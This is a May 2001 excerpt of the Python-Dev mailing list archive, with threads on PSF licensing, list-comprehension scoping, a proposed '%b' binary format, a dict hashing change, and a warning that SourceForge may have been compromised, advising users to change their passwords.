 (I am large, I contain multitudes)"

        Greg
-- 
Greg Ward - Unix nerd                                   gward at python.net
http://starship.python.net/~gward/
Money is a powerful aphrodisiac.  But flowers work almost as well.


From barry at digicool.com  Wed May 30 17:07:12 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 11:07:12 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class 
 for threading
References: <thomas@xs4all.net>
	<20010530131424.Y690@xs4all.nl>
	<20010530122702.F3FE53B8999@snelboot.oratrix.nl>
Message-ID: <15125.3232.925401.563151@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> The easiest solution would of course be for Itamar to get his
    TW> boss/lawyers to give us the right to relicence it under the
    TW> PSF licence :)

>>>>> "JJ" == Jack Jansen <jack at oratrix.nl> writes:

    JJ> I think this is the only viable solution. If various parts of
    JJ> Python have different license agreements this may well be a
    JJ> reason for people not to use Python because the hassle of
    JJ> figuring out which pieces fit their own licensing policy.

I completely agree.  IMO, the most important job of the PSF is to make
the Python IP sane again.  That means clearing as much of the existing
rights as possible, and releasing it under the NAIPL (New And Improved
Python License).  Any code that is licensed differently could mean
that it'll be ripped out of some re-distributions.  I'd be less
concerned about some ancillary module that few people use, and much
more concerned about some core piece of the code.

-Barry


From mal at lemburg.com  Wed May 30 21:57:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 21:57:17 +0200
Subject: [Python-Dev] Autoconf problems on BeOS
Message-ID: <3B15509D.C790D5DF@lemburg.com>

I have a bug report assigned to myself which really is more
about autoconf than Unicode. The problem is that the
SIZEOF_xxx tests cause the Metroworks compiler on BeOS to
fail and this again causes these defines to be set to 0 !

Could someone with more autoconf experience please have a look ?

https://sourceforge.net/tracker/?func=detail&aid=420416&group_id=5470&atid=105470

Thanks,
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Wed May 30 22:07:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:07:37 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64929.215666.745913@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>

[Tim]
> Note that "the iterator variables" needn't be bare names:

[Fred]
>   I didn't realize this either.

You have to get your head out of the docs and read more code <wink>.

> I'm quite surprised by it, in fact, though I understand (I think) why
> it works that way.  But was this intentional?

I expect so.

> It seems like pure evil to me!

Sometimes it's the bee's knees; for example,

>>> digits = range(3)
>>> x = [None] * 3
>>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]
>>> base3
[[0, 0, 0], [0, 0, 1], [0, 0, 2],
 [0, 1, 0], [0, 1, 1], [0, 1, 2],
 [0, 2, 0], [0, 2, 1], [0, 2, 2],
 [1, 0, 0], [1, 0, 1], [1, 0, 2],
 [1, 1, 0], [1, 1, 1], [1, 1, 2],
 [1, 2, 0], [1, 2, 1], [1, 2, 2],
 [2, 0, 0], [2, 0, 1], [2, 0, 2],
 [2, 1, 0], [2, 1, 1], [2, 1, 2],
 [2, 2, 0], [2, 2, 1], [2, 2, 2]]
>>>

I've done stuff "like that" often, albeit via the nested-loop spelling.

> I'd only expect it to support bare names and sequence unpacking (with
> only bare names at the "edge" of all nested unpackings).

It's too late to take it away now!  Python always worked this way.  And it's
really got nothing to do with what implementing what David wants (e.g., the
lambda transformation I mentioned preserves its semantics) -- apart from (I
hope) driving home that changes need to be considered very carefully.


From tim.one at home.com  Wed May 30 22:22:19 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 16:22:19 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15124.64105.184857.499019@gargoyle.cs.uchicago.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>

[David Beazley, pretty much repeats why he doesn't like the current scheme]

I hoped it was clear the first time I was at least half sympathetic!  If it
wasn't, I am <wink>.

>> >>> i = 12
>> >>> (lambda: [i**2 for i in range(4)])()
>> [0, 1, 4, 9]
>> >>> i
>> 12
>> >>>
>>
>> That's more like Haskell does it.

> Ah yes, well this is exactly the kind of behavior that seems most
> natural to me.   It's also the behavior that everyone expected went I
> went around to the various Python hackers in the department and asked
> them about it yesterday.

I believe that.

> I suppose I could just write this:
>
>   a = (lambda s: [2*i for i in s])(s)
>
> However, that's pretty ugly.

It's too complicated, isn't it?  In the presence of nested scopes (which are
reality in 2.2),

    a = (lambda: [2*i for i in s])()

does the same thing and is conceptually clearer.  I'm not suggesting that
you actually write that, but view it as a *model* for your intended
semantics.  I wouldn't want to see the implementation actually use a lambda
under the covers, either, but we need some crisp way to explain the intent.
Note that the lambda-trick *model* "does the right thing" for for-loop
targets like x.i and x[i] too.

> In any case, I'm mostly just curious if anyone else has been bitten by
> the problem I've described.  I would certainly love to see a fix for
> it (I would even volunteer to work on a prototype implementation if
> there is interest).

I encourage that, but since it's not 100% backward-compatible you'll enjoy
the usual range of hysterical <wink> opposition.  Needs a PEP, and possibly
even an associated future-statement.  Overall, I'm more in favor of changing
it than not.


From skip at pobox.com  Wed May 30 22:48:47 2001
From: skip at pobox.com (Skip Montanaro)
Date: Wed, 30 May 2001 15:48:47 -0500
Subject: [Python-Dev] scoping and list comprehensions
Message-ID: <15125.23727.168431.762320@beluga.mojam.com>

Regarding the issue of how list comprehensions should relate to their
environment, perhaps instead of modifying list comprehensions to make them
execute in new local scopes (or at least appear to) a better solution would
be to allow a new local scope to be introduced inline, sort of like in C:

    {
        int i;
	for (i=0; i < 10; i++) {
            dostuffwith(i);
	}
    }

While this might be used more for list comprehensions than other constructs,
I'm sure people will find a way to (ab)use it for other things as well.  I
don't see an obvious way of adding such functionality to Python without
introducing a new keyword though, which is going to make it difficult to get
past Guido:

    l = []
    scope:
        l = [i**2 for i in range(10)]
    print l

Hmmm, wait a minute, what if you terminated a block introducer (if or while
clause or try/except clauses) with something other than a colon?  (I'm just
thinking out loud, I don't think this is necessarily a good solution).

    if 1:		# no new scope introduced
        l = [i**2 for i in range(10)]
    print l

vs.

    if 1;		# new scope introduced for enclosed block
        l = [i**2 for i in range(10)]
    print l

That certainly has some line noise qualities about it, especially since
colons and semicolons are visually so similar, but does offer an alternative
to introducing a new keyword into the language.

Hmmm, wait another minute, perhaps you could simply overload def:

    l = []
    def:
        l = [i**2 for i in range(10)]
    print l

There's also the problem of how to export results from the scope, though
perhaps the new nested scope stuff provides a solution to that.  (I've
ignored them so far, so I can't tell...)

Would it be possible for the compiler to recognize the degenerate def: and
simply mangle any names that would clash instead of introducing an actual
new execution frame?  The above might be equivalent to

    l = []
    l = [__mangled_i**2 for __mangled_i in range(10)]
    print l

if 'i' already existed in the same scope.

Just thinking out loud.  I'm not sure any of these ideas is any better than
the current state of affairs.

Skip


From Greg.Wilson at baltimore.com  Wed May 30 23:11:16 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 30 May 2001 17:11:16 -0400
Subject: [Python-Dev] %b format?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>

I would like to add a "%b" format for converting
numbers to binary format (1's and 0's).  I realize
this isn't a C-ism, but it would be very useful for
teaching purposes, as newcomers find 101101 a lot
easier to understand than 0x2D.

Reactions?

Greg


-----------------------------------------------------------------------------------------------------------------
The information contained in this message is confidential and is intended 
for the addressee(s) only.  If you have received this message in error or 
there are any problems please notify the originator immediately.  The 
unauthorized use, disclosure, copying or alteration of this message is 
strictly forbidden. Baltimore Technologies plc will not be liable for direct, 
special, indirect or consequential damages arising from alteration of the 
contents of this message by a third party or as a result of any virus being 
passed on.

In addition, certain Marketing collateral may be added from time to time to 
promote Baltimore Technologies products, services, Global e-Security or 
appearance at trade shows and conferences.
 
This footnote confirms that this email message has been swept by 
Baltimore MIMEsweeper for Content Security threats, including
computer viruses.


From esr at thyrsus.com  Wed May 30 23:28:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:28:38 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <20010530172838.A778@thyrsus.com>

Greg Wilson <Greg.Wilson at baltimore.com>:
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).  I realize
> this isn't a C-ism, but it would be very useful for
> teaching purposes, as newcomers find 101101 a lot
> easier to understand than 0x2D.
> 
> Reactions?

+1.  Didactically pretty useful, and the additional code won't boost
global complexity much.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Where rights secured by the Constitution are involved, there can be no
rule making or legislation which would abrogate them.
        -- Miranda vs. Arizona, 384 US 436 p. 491


From tim.one at home.com  Wed May 30 23:30:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:30:49 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <20010530131424.Y690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>

[Thomas Wouters]
> This raises an interesting point. Do we want separate pieces of the
> Python distribution to have separate licences ?

This is a question for the PSF to resolve, since the PSF is intended to
become the sole legal owner of Python's IP rights.

My position will be that nothing ships in the distribution unless copyright
has been assigned to the PSF, or the contributor has agreed to give the PSF
a non-exclusive irrevocable etc license to release their work under the PSF
license du jour.  Fleshing out the second option so as to prevent abuse on
either side is going to require significant effort ("what if the PSF goes
away?", "what if the PSF changes its license to something I hate?", "what if
I change my mind?", etc).

Unfortunately, significant effort takes significant time too, and nobody has
started on this yet.


From mal at lemburg.com  Wed May 30 23:31:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 23:31:06 +0200
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com>
Message-ID: <3B15669A.43B70A44@lemburg.com>

"Eric S. Raymond" wrote:
> 
> Greg Wilson <Greg.Wilson at baltimore.com>:
> > I would like to add a "%b" format for converting
> > numbers to binary format (1's and 0's).  I realize
> > this isn't a C-ism, but it would be very useful for
> > teaching purposes, as newcomers find 101101 a lot
> > easier to understand than 0x2D.
> >
> > Reactions?
> 
> +1.  Didactically pretty useful, and the additional code won't boost
> global complexity much.

Good idea. The only question I have is: in which order will
you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I am thinking of adding a bit field type to mxNumber and have
the same problem there...

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Wed May 30 23:42:22 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:42:22 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400
References: <20010530131424.Y690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>
Message-ID: <20010530174222.A1019@thyrsus.com>

Tim Peters <tim.one at home.com>:
> My position will be that nothing ships in the distribution unless copyright
> has been assigned to the PSF, or the contributor has agreed to give the PSF
> a non-exclusive irrevocable etc license to release their work under the PSF
> license du jour.  Fleshing out the second option so as to prevent abuse on
> either side is going to require significant effort ("what if the PSF goes
> away?", "what if the PSF changes its license to something I hate?", "what if
> I change my mind?", etc).
> 
> Unfortunately, significant effort takes significant time too, and nobody has
> started on this yet.

I think a PSF pleadge to use only an OSI-certified license would address
some of these issues.  Write it into the bylaws if necessary.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

He that would make his own liberty secure must guard even his enemy from
oppression: for if he violates this duty, he establishes a precedent that
will reach unto himself.
	-- Thomas Paine


From esr at thyrsus.com  Wed May 30 23:44:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:44:57 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com>
Message-ID: <20010530174457.B1019@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > > I would like to add a "%b" format for converting
> > > numbers to binary format (1's and 0's).  I realize
> > > this isn't a C-ism, but it would be very useful for
> > > teaching purposes, as newcomers find 101101 a lot
> > > easier to understand than 0x2D.
> > 
> > +1.  Didactically pretty useful, and the additional code won't boost
> > global complexity much.
> 
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?
> 
> I am thinking of adding a bit field type to mxNumber and have
> the same problem there...

For *this* context, we clearly want mathematical notation; MSB to the right
and no byte-swapping.  After all we'd actually be printing numerals, not 
dumping a bitfield.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The people of the various provinces are strictly forbidden to have in their
possession any swords, short swords, bows, spears, firearms, or other types
of arms. The possession of unnecessary implements makes difficult the
collection of taxes and dues and tends to foment uprisings.
        -- Toyotomi Hideyoshi, dictator of Japan, August 1588


From barry at digicool.com  Wed May 30 23:49:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 17:49:22 -0400
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <15125.27362.431144.886216@anthem.wooz.org>

>>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:

    GW> I would like to add a "%b" format for converting numbers to
    GW> binary format (1's and 0's).

For completeness, wouldn't you also want a binary integer literal so
your students could write binary numbers in their code?  And what
about a binary() operator a la hex()?

-Barry


From tim.one at home.com  Wed May 30 23:50:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:50:31 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>

[Greg Wilson]
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).

-0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
%o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
unfortunate that Python has distinct nb_oct and nb_hex slots in the
PyNumberMethods struct (as opposed to a single parameterized "convert to
base N string" method).

[MAL]
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I'm sure Greg has in mind only integers, in which case %x and %o already
give the only useful <wink> answer.


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 23:51:22 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 17:51:22 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Update for development version of Python (2.2).

This update substantially re-works the prototype support for
productions of a formal grammar.  They look better, support forward
references to symbol definitions, and allow download of an all-text
version of the complete grammar (with productions ordered the same way
as they are in the documentation sources).

"Documeting Python" now includes documentation for the LaTeX markup
used to describe productions:

    http://python.sourceforge.net/devel-docs/doc/grammar-displays.html


From esr at thyrsus.com  Thu May 31 00:05:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:05:09 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400
References: <3B15669A.43B70A44@lemburg.com> <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>
Message-ID: <20010530180509.B1305@thyrsus.com>

Tim Peters <tim.one at home.com>:
> -0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
> %o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
> unfortunate that Python has distinct nb_oct and nb_hex slots in the
> PyNumberMethods struct (as opposed to a single parameterized "convert to
> base N string" method).

Is the right answer to add the convert-to-base slot and deprecate the
other two?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If gun laws in fact worked, the sponsors of this type of legislation
should have no difficulty drawing upon long lists of examples of
criminal acts reduced by such legislation. That they cannot do so
after a century and a half of trying -- that they must sweep under the
rug the southern attempts at gun control in the 1870-1910 period, the
northeastern attempts in the 1920-1939 period, the attempts at both
Federal and State levels in 1965-1976 -- establishes the repeated,
complete and inevitable failure of gun laws to control serious crime.
        -- Senator Orrin Hatch, in a 1982 Senate Report


From fdrake at acm.org  Thu May 31 00:00:15 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 18:00:15 -0400 (EDT)
Subject: [Python-Dev] Most recent documentation update
Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>

  One thing I forgot to mention in my announcement of the update to
the development documnetation which I just posted is that I went ahead
and converted all but one of the productions in the Reference Manual
to the new markup.  The print_stmt production, unfortunately, is given
twice instead of using a single model for the statement.  The
formatting tools don't support that (yet), and it's not clear that
they should.
  (No, Barry, don't go changing it...!)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From esr at thyrsus.com  Thu May 31 00:03:41 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:03:41 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <20010530180341.A1305@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> 
> >>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:
> 
>     GW> I would like to add a "%b" format for converting numbers to
>     GW> binary format (1's and 0's).
> 
> For completeness, wouldn't you also want a binary integer literal so
> your students could write binary numbers in their code?  And what
> about a binary() operator a la hex()?

Barry is correct.  If we're going to do this, we ought to do it right and
support binary on a par with decimal, hex, and octal.  I favor this.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations.
	-- David Friedman


From barry at digicool.com  Thu May 31 00:05:37 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 18:05:37 -0400
Subject: [Python-Dev] Most recent documentation update
References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>
Message-ID: <15125.28337.938136.505675@anthem.wooz.org>

>>>>> "Fred" == Fred L Drake, Jr <fdrake at acm.org> writes:

    Fred> (No, Barry, don't go changing it...!)

Oh darn, three whole days work wasted...

:)


From tim.one at home.com  Thu May 31 00:17:42 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:17:42 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>

Note that in Vyper (John Skaller's Python variant) these are legit integer
literals:

0b11111111 0B11111111
0o777      0O777
0d999      0D999
0xfFf      0XFFf

Vyper's octal notation is still ugly, but whoever first thought

    0777 != 777

was a "good idea" was certifiably insane <0.25 wink>.


From tim.one at home.com  Thu May 31 00:29:33 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:29:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530180509.B1305@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>

[Eric S. Raymond]
> Is the right answer to add the convert-to-base slot and deprecate the
> other two?

That would fix "the other" lump here in Python, that e.g.

>>> int("111", 3)
13
>>>

has no inverse.  string->int is happy with any base in 2..36 inclusive, but
int->string is spelled via 3 different builtins covering only 3 of those
bases.

It would be more *expedient* to add "just" a __bin__/nb_bin method + a way
to spell binary int literals + a %b format + a bin() builtin.

On the fifth hand, I doubt anyone would want to add new % format codes for
bases {2..36} - {2, 8, 10, 16}.

So it will remain lumpy no matter what.  I look forward to the PEP <wink>.


From esr at thyrsus.com  Thu May 31 00:38:33 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:38:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530183833.B1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

For anyone who doesn't know the history behind this...  

The 0xxx notation was copied from PDP-11 assembler literals -- the
instruction-set design of the PDP-11 was such that most of the
instruction subfields fit in octal digits, so this convention made it
somewhat easier to read machine-code dumps.

While I'm at it, I should note that the design of the 11 was ancestral
to both the 8088 and 68000 microprocessors, and thus to essentially 
every new general-purpose computer designed in the last fifteen years.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Are we to understand," asked the judge, "that you hold your own interests
above the interests of the public?"

"I hold that such a question can never arise except in a society of cannibals."
	-- Ayn Rand


From esr at thyrsus.com  Thu May 31 00:39:43 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:39:43 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400
References: <20010530180509.B1305@thyrsus.com> <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <20010530183943.C1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [Eric S. Raymond]
> > Is the right answer to add the convert-to-base slot and deprecate the
> > other two?
> 
> That would fix "the other" lump here in Python, that e.g.
> 
> >>> int("111", 3)
> 13
> >>>
> 
> has no inverse.  string->int is happy with any base in 2..36 inclusive, but
> int->string is spelled via 3 different builtins covering only 3 of those
> bases.

That sounds like a strong argument to me.  
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The world is filled with violence. Because criminals carry guns, we
decent law-abiding citizens should also have guns. Otherwise they will
win and the decent people will lose.
        -- James Earl Jones


From nas at python.ca  Thu May 31 00:38:58 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 30 May 2001 15:38:58 -0700
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530153858.A21901@glacier.fnational.com>

Tim Peters wrote:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

Ever used MacLisp or ZetaLisp?  There:

    777 == 0d511

If only we had been born with 8 or 16 fingers, right?

  Neil


From thomas at xs4all.net  Thu May 31 03:52:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 03:52:48 +0200
Subject: [Python-Dev] SF hacked
Message-ID: <20010531035248.G690@xs4all.nl>

It *seems*, from this site:

http://66.92.75.28/~vladimir/themes-org.html

that SourceForge has been hacked, and more seriously than SF first admits
(if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :)
And the same goes for apache.org, it looks like. Anyway, if anyone connected
*from* any of sourceforge's machines to anywhere else, in the last couple of
months, they'll be well advised to change their passwords and check for
intruders. The same goes if you connect through ssh and (foolishly ;)
allowed ssh-agent-forwarding to the SF machines. In that case, better check
all the machines that ssh-agent would give you unpassworded access to for
logins you don't recognize. The site above lists a number of sniffed
passwords, in case you want to check, but there's no reason for the hacker
not to have even more sniffed passwords lying about :)

And if you have a login on apache.org, you probably want to change your
password in any case.... the above listed site has what seems to be a copy
of the shadow password file.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Thu May 31 05:53:53 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 23:53:53 -0400
Subject: [Python-Dev] One more dict trick
Message-ID: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>

If anyone has an app known or suspected to be sensitive to dict timing,
please try the patch here.  Best I've been able to tell, it's a win.  But
it's a radical change in approach, so I don't want to rush it.

This gets rid of the polynomial machinery entirely, along with the branches
associated with updating the things, and the dictobject struct member
holding the table's poly.  Instead it relies on that

    i = (5*i + 1) % n

is a full-period RNG whenever n is a power of 2 (that's what guarantees it
will visit every slot), but perturbs that by adding in a few bits from the
full hash code shifted right each time (that's what guarantees every bit of
the hash code eventually influences the probe sequence, avoiding simple
quadratic-time degenerate cases).
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: dict.txt
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010530/11ef83d8/attachment.txt>

From tim.one at home.com  Thu May 31 06:46:56 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:46:56 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530183833.B1654@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIHKFAA.tim.one@home.com>

[ESR]
> The 0xxx notation was copied from PDP-11 assembler literals -- the
> instruction-set design of the PDP-11 was such that most of the
> instruction subfields fit in octal digits, so this convention made it
> somewhat easier to read machine-code dumps.

That doesn't mean they weren't certifiably insane.  At Cray, we had a much
more sensible convention:  *all* numbers were octal (yes, it was a 64-bit
box and octal didn't make any sense, but Seymour Cray got used to it from
the 60-bit CDC w/ 18-bit address registers and didn't feel like changing).
My first boss there loved telling the story about he was out for a drive
with the family, and excitedly screamed "Hey, kids!  Look!  The odometer is
just about to change to 40,000!".  Of course it read 37,777.9 at the time,
and they thought he was nuts.  That's where this kind of thing always leads
in the end.

to-disgrace-despair-and-eventually-ruin-ly y'rs  - tim


From tim.one at home.com  Thu May 31 06:48:28 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:48:28 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530153858.A21901@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIHKFAA.tim.one@home.com>

[Neil Schemenauer]
> Ever used MacLisp or ZetaLisp?  There:
>
>     777 == 0d511
>
> If only we had been born with 8 or 16 fingers, right?

Then guys would probably be attracted to base 9 or 17.

sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs  - tim


From greg at cosc.canterbury.ac.nz  Thu May 31 07:15:24 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:15:24 +1200 (NZST)
Subject: [Python-Dev] scoping and list comprehensions
In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com>
Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz>

Skip:

>    scope:
>        l = [i**2 for i in range(10)]

By analogy with C, the introducer of a new scope should
simply be an unadorned colon:

  :
    l = [i**2 for i in range(10)]

:-)

While this might be useful, it doesn't really address the issue
raised, because we really need a new scope per listcomp (or
maybe even each 'for' in the listcomp).

> There's also the problem of how to export results from the scope, though
> perhaps the new nested scope stuff provides a solution to that.

Nope -- there's still no way to assign to any name in
an intermediate scope. Something heretical, such as
declarations, would be needed.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:11 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz>

Tim:

> >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in
>              digits]

Yikes! That would be clearer as

  [[x,y,z] for x in digits for y in digits for z in digits]

I'll concede it's nowhere near as much fun, though...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
